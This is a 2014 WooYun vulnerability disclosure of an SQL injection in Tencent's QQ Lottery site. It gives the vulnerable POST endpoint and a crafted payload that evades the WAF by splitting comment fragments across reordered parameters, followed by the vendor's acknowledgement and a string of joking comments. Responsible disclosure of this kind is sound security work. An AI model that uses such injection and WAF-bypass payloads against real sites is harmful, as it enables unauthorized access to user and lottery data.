当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-069416

漏洞标题:腾讯QQ彩票某处SQL注射

相关厂商:腾讯

漏洞作者: Jannock

提交时间:2014-07-23 15:45

修复时间:2014-09-06 15:46

公开时间:2014-09-06 15:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-07-23: 细节已通知厂商并且等待厂商处理中
2014-07-28: 厂商已经确认,细节仅向厂商公开
2014-08-07: 细节向核心白帽子及相关领域专家公开
2014-08-17: 细节向普通白帽子公开
2014-08-27: 细节向实习白帽子公开
2014-09-06: 细节向公众公开

简要描述:

腾讯的waf越来越利害了,手中几个注入都成了鸡肋。刚好发现腾讯QQ彩票某处SQL注射,此注入点存在两种方式绕过waf。

详细说明:

注入地址:

POST /my/index.php?mod=securityinfo&op=AjaxUpdateTipsSet HTTP/1.1
Host: 888.sports.qq.com
typ=kjhm&kjhm_ssq=1&kjhm_dlt=0&kjhm_fc3d=0&kjhm_pl3=0&kjhm_pl5=0&kjhm_qlc=0&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0


除了 typ 参数外,其它参数都存在SQL注入
猜是 update 型 注入
像 update table set kjhm_ssq=1,kjhm_dlt=0 ...... where uid=xxxxx
由于这里太多参数,所以可以结合多参数方式绕过waf拦截
方式1:

typ=kjhm&kjhm_pl3=0*/select 2)))/*&kjhm_dlt=0*/((1=1),0,/*&kjhm_pl5=0*//*&kjhm_qlc=0*/&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0&kjhm_fc3d=0*/(select 1 union/*&kjhm_ssq=1-(if/*typ=kjhm&kjhm_pl3=0*/select 2)))/*&kjhm_dlt=0*/((1=2),0,/*&kjhm_pl5=0*//*&kjhm_qlc=0*/&kjhm_qxc=0&kjhm_exw=0&kjhm_sfc=0&kjhm_r9=0&kjhm_jq=0&kjhm_bq=0&kjhm_fc3d=0*/(select 1 union/*&kjhm_ssq=1-(if/*


根据参数顺序不同来绕过。有多种组合来实现过滤拦截。
由于大部分工具不支持,那么我们来第二种。
方式2:
参考: WooYun: 腾讯某分站一个比较有意思的SQL注射漏洞
继续可用。。

漏洞证明:

11.jpg

修复方案:

过滤

版权声明:转载请注明来源 Jannock@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:10

确认时间:2014-07-28 09:27

厂商回复:

非常感谢您的报告,问题已着手处理,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理。

最新状态:

暂无

漏洞评价:

评论

  1. 2014-07-23 15:50 | Anonymous ( 普通白帽子 | Rank:146 漏洞数:30 | 园长是大傻逼)

    很棒

  2. 2014-07-23 15:52 | 乐乐、 ( 普通白帽子 | Rank:853 漏洞数:189 )

    这个屌了。。。

  3. 2014-07-23 15:52 | YY-2012 ( 普通白帽子 | Rank:2763 漏洞数:641 | 意淫,是《红楼梦》原创的词汇,但后来演变...)

    可以中500w吗?

  4. 2014-07-23 15:58 | 浮萍 ( 普通白帽子 | Rank:555 漏洞数:118 | 默默潜水)

    本来我该中奖了,谁给我改了

  5. 2014-07-23 16:02 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    500万 在哪里

  6. 2014-07-23 16:06 | 玉林嘎 ( 普通白帽子 | Rank:758 漏洞数:96 )

    前排卖彩票

  7. 2014-07-23 16:38 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    给力

  8. 2014-07-23 17:32 | 紫衣大侠 ( 普通白帽子 | Rank:201 漏洞数:21 | 愿结天下有识之士)

    为毛这么牛B。。。

  9. 2014-07-23 17:34 | Lonely ( 实习白帽子 | Rank:72 漏洞数:27 | 人生如梦,始终都游不过当局者迷的悲哀。)

    我买中了的 结果被洞主改了数据 还我 500万。

  10. 2014-07-23 17:44 | noob ( 实习白帽子 | Rank:81 漏洞数:18 | 向各位大神学习,向各位大神致敬)

    我的1000万是不是你改的!!!

  11. 2014-07-23 17:56 | Aerfa21 ( 普通白帽子 | Rank:165 漏洞数:44 )

    洞主,你是怎么绕waf的?

  12. 2014-07-23 18:20 | 夏殇 ( 路人 | Rank:30 漏洞数:21 | 不忘初心,方得始终。)

    居然还能挖腾讯sql

  13. 2014-07-23 19:32 | Jn· ( 路人 | Rank:30 漏洞数:14 | 本小菜很可爱,如果不服你TM来打我啊--哎呀...)

    500万呢

  14. 2014-07-23 19:48 | 1c3z ( 实习白帽子 | Rank:88 漏洞数:29 | 我读书少,你可别骗我!!!)

    非常感谢您的报告,该问题其他白帽子已报告过,感谢大家对腾讯业务安全的关注。如果您有任何疑问,欢迎反馈,我们会有专人跟进处理

  15. 2014-07-23 22:59 | 老和尚 ( 普通白帽子 | Rank:223 漏洞数:45 | 总有一天,我会骑着雨牛@'雨。踩着一哥@jan...)

    @1c3z 经常听到...

  16. 2014-07-24 12:17 | CoffeeSafe ( 普通白帽子 | Rank:142 漏洞数:37 )

    今晚一起买彩票~

  17. 2014-07-25 11:33 | 黑色的屌丝 ( 路人 | Rank:27 漏洞数:5 | →_→→_→)

    我就想知道。一哥怎么快速定位一个注入点的。

  18. 2014-07-28 09:37 | C4ndy ( 路人 | Rank:6 漏洞数:1 )

    我的彩票绝对是让你改的,

  19. 2014-07-28 09:56 | 紫霞仙子 ( 普通白帽子 | Rank:2027 漏洞数:279 | 天天向上 !!!)

    还我100000万

  20. 2014-09-06 17:51 | bey0nd ( 普通白帽子 | Rank:895 漏洞数:142 | 相忘于江湖,不如相濡以沫)

    快速定位一个注入点的

  21. 2014-09-06 18:21 | yinian ( 实习白帽子 | Rank:67 漏洞数:22 | 代 码 审 计 求 交 流)

    赶紧脱裤

  22. 2014-10-08 17:36 | 胡小树 ( 实习白帽子 | Rank:60 漏洞数:11 | 我是一颗小小树)

    这组合看的真头晕

  23. 2014-11-05 16:38 | 黑吃黑 ( 普通白帽子 | Rank:139 漏洞数:29 | 倚楼听风雨,淡看江湖路...)

    真的好强大!

  24. 2014-12-19 16:22 | 风之传说 ( 普通白帽子 | Rank:138 漏洞数:28 | 借用朋友的一句话,你的时间在哪里,你的成...)

    真特么屌爆了。。代码牛伤不起啊。。